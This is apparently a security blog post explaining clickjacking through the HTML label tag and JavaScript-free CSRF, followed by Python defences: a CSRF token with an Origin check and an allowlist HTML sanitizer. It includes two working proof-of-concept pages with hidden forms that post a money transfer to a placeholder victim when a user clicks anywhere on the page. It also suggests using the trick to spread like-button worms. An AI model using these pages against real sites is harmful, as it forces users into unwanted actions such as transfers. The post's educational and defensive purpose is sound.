label clickjacking and javascriptless csrf


Another niche attack. I happened to notice the interesting behaviour of the <label> tag today while working on some web application development.

<label for="target">*STUFF*</label>

The for attribute references a form control by its id: whenever anything between the label's start and end tags is clicked, the browser dispatches a click event on that control, and this works for many different input types. This is intended behaviour, but it can be abused for clickjacking.

Here is a way to abuse it for submitting csrf forms.

labelcsrf.html

<!DOCTYPE HTML>
<html>
<body>
        <!-- A page-sized, empty label: clicking anywhere on it clicks the submit button below -->
        <label for="target_element" style="display: block; height: 13370px; width: 100%;">
        </label>

        <form method="post" action="http://victim" style="display: none;" >
                <input type="text" name="moneys" value="all">
                <input type="text" name="recipient" value="evul_haxxer">
                <input id="target_element" type="submit" name="send" value="Send moneys">
        </form>
</body>
</html>

Of course, it's a bit redundant. The following snippet does the same thing without using the label tag at all.

invisbuttoncsrf.html

<!DOCTYPE HTML>
<html>
<body>
        <form method="post" action="http://victim">
                <!-- The submit button itself is stretched over the page and made transparent -->
                <input id="target_element" type="submit" name="send" value="Send moneys" style="display: block; height: 13370px; width: 100%; opacity: 0;">
                <input type="text" name="moneys" value="all">
                <input type="text" name="recipient" value="evul_haxxer">
        </form>
</body>
</html>

I tested both of these in Firefox with NoScript and they pass.
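Neither snippet needs JavaScript because the browser submits the form exactly as it would for a legitimate user, session cookie included, so the server cannot distinguish the two from the posted fields alone. The standard defence is a per-session token that a page on another origin has no way to read, optionally backed by a check of the browser-supplied Origin header. The following is an added example of that check in Python, not code from this post: the hidden field name `csrf_token` and the origins `http://attacker.example` and `http://victim` are assumed values, and the posted fields are the ones labelcsrf.html submits.

```python
"""Server-side defence against the form-based CSRF shown above: a
per-session synchronizer token that a cross-site form cannot know.
Added example, not from the original post; field names mirror the
constructed form in labelcsrf.html."""
import hmac
import secrets
from typing import Dict, Optional, Tuple

TOKEN_FIELD = "csrf_token"  # hypothetical hidden-input name used by legitimate forms


def issue_token() -> str:
    """Unguessable token to store in the session and embed as
    <input type="hidden" name="csrf_token" value="..."> in real forms."""
    return secrets.token_hex(32)


def is_valid_post(form: Dict[str, str], session_token: Optional[str],
                  origin: Optional[str], site_origin: str) -> Tuple[bool, str]:
    """Return (accepted, reason) for a state-changing POST.

    Rejects when the session has no token, the form omits it, it does not
    match (constant-time compare), or the Origin header names another site.
    Browsers send Origin on cross-site form posts, so a missing header is
    tolerated but a mismatching one is not."""
    if session_token is None:
        return False, "no token in session"
    submitted = form.get(TOKEN_FIELD)
    if not submitted:
        return False, "token missing from form"
    if not hmac.compare_digest(submitted, session_token):
        return False, "token mismatch"
    if origin is not None and origin != site_origin:
        return False, "cross-origin submission from " + origin
    return True, "ok"


def demo() -> Tuple[Tuple[bool, str], Tuple[bool, str]]:
    """Run the check against the post's form (no token, foreign origin)
    and against the same fields sent by the site's own tokenised form."""
    session_token = issue_token()
    # Constructed: exactly the fields labelcsrf.html posts, nothing more.
    hostile = {"moneys": "all", "recipient": "evul_haxxer", "send": "Send moneys"}
    legit = dict(hostile, **{TOKEN_FIELD: session_token})
    hostile_result = is_valid_post(hostile, session_token, "http://attacker.example", "http://victim")
    legit_result = is_valid_post(legit, session_token, "http://victim", "http://victim")
    return hostile_result, legit_result


if __name__ == "__main__":
    print(demo())
```

The token check alone is what stops both snippets on this page; the Origin comparison is a second, independent layer for the case where a token leaks. Marking the session cookie `SameSite=Lax` or `Strict` additionally keeps the browser from attaching it to a cross-site POST in the first place.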

But imagine a scenario where the site's filtering of user-supplied HTML is not as strict as it should be and a label tag gets through. A label whose for attribute names the id of one of the site's own rendered controls could then trigger clicks on that control without the user's consent. Imagine a social media site with a "like" feature à la Facebook, for example. Triggering a click on the like could make for some fun Samy-like worms.

Fortunately, most sites use whitelists for user-supplied HTML these days.
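What a whitelist filter has to do to neutralise the label trick is drop every tag and attribute it does not explicitly know, keeping only the text, so that neither a label with a for attribute nor an id that the label could point at survives into the rendered page. Below is an added example of such a filter in Python on the standard library's html.parser; it is not code from this post, and the allowed tag and attribute sets are assumptions chosen for illustration.

```python
"""Allowlist HTML sanitizer for user-supplied content (added example,
not from the original post). Unknown tags are removed but their text is
kept; unknown attributes, including `for`, `id` and `style`, are dropped."""
from html import escape
from html.parser import HTMLParser

# Assumed policy: a small set of formatting tags, href only on links.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
ALLOWED_SCHEMES = ("http://", "https://")
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document from parsed tokens, emitting only what the
    allowlist permits. Everything else (label, input, form, script, ...)
    contributes its text content and nothing more."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # drop the tag itself; handle_data still keeps its text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            # Links are allowed, but only to plain web URLs.
            if name == "href" and not value.strip().lower().startswith(ALLOWED_SCHEMES):
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        # Text is re-escaped, so stray "<" in content cannot form new tags.
        self.out.append(escape(data, quote=False))


def sanitize(html: str) -> str:
    """Return the allowlisted rendering of `html`."""
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed sample: a label aimed at a control the site itself renders.
    print(sanitize('<label for="like_button" style="display:block;height:9999px">great post</label>'))
```

Run against the constructed label above, the filter returns only `great post`; a `<p id="like_button">` in user content likewise loses its id, so a stray label elsewhere has nothing to target. The approach generalises: the same parser drops `form` and `input` tags, so the two CSRF pages earlier in this post would also be reduced to their visible text if posted as user content.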